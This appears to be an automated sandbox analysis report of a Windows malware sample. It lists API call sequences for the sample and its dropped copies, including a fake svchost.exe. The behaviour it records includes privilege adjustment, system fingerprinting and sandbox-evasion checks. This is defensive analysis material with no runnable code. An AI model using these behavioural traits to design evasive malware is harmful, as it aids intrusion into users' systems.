Source: unknown Network traffic detected: HTTP traffic on port 8000 -> 49759
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,2_2_02C7C380
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7C069
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C78F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,2_2_02C78F20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,2_2_02C7BDD0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0124C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0124C069
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0124C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,6_2_0124C380
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0124BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,6_2_0124BDD0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01248F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,6_2_01248F20
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0124BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0124BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0104C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,7_2_0104C069
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0104C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,7_2_0104C380
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0104BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,7_2_0104BDD0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01048F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,7_2_01048F20
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0104BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,7_2_0104BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A2C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_00A2C069
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A2C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,9_2_00A2C380
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A2BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,9_2_00A2BDD0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A2BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,9_2_00A2BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A28F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,9_2_00A28F20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C844F0 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02C844F0
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C74920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,IsUserAnAdmin,IsUserAnAdmin,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 2_2_02C74920
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 6_2_01244920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 6_2_01244920
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 7_2_01044920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 7_2_01044920
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe Code function: 9_2_00A24920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 9_2_00A24920
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403900
Source: C:\Users\user\Desktop\UMwpXhA46R.exe Code function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,0_2_00402C10
Source: C:\Windows\apppatch\svchost.exe Code function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,2_2_00403900
Source: C:\Windows\apppatch\svchost.exe Code function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,2_2_00402C10
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,InitializeCriticalSection,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetHandleInformation,CreateThread,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,2_2_02C85890
Source: C:\Windows\apppatch\svchost.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,2_2_02C77020
